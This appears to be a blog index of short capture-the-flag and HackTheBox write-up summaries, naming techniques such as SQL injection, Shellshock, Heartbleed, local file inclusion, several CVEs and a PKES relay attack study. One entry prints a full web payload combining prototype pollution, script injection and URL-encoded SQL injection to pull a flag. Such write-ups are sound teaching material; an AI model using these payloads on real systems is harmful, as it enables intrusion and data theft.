tl;dr

• SQL Injection
• Linpeas Priv-Esc

tl;dr

• The dump has some encrypted functions
• The encrypted bytes are being xorred with a 32 byte key
• Find the xor_key in the dump
• Use xor_key offset to find the offset of AES_key and iv
• AES_CBC decrypt to find flag

tl;dr

• Shellshock
• Local File Inclusion

Cracking the Arctic Box.

tl;dr

• Adobe ColdFusion 8
• MS10-059
• CVE-2009-2265

Cracking Valentine box without using metasploit.

tl;dr

• HeartBleed Vulnerability
• CVE-2014-0160

How to crack Nibbles box without Metasploit.

tl;dr

• Nibbleblog v4.0.3 Code Execution
• CVE-2015-6967

tl;dr

• Unintended Solution: Cookie Path Restriction bypass using pop-up windows + JS Sandbox Escape
• Intended Solution: Service Workers + JS Sandbox Escape

tl;dr

• Payload: {"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='/admin/debug/add_widget?panelid=star7rix&widgetname=test123&widgetdata=%27%29%2C%28%27star7rix%27%2C+%28select+flag+from+flag%29%2C+%27%7B%22type%22%3A%22test123%22%7D%27%29+--'></script>\"}}"}

How to crack Shocker box without Metasploit.

tl;dr

• ShellShocker exploit
• Apache mod_cgi

tl;dr

In this post, we are going to share our research into PKES systems and the possibility of Relay attacks on such systems.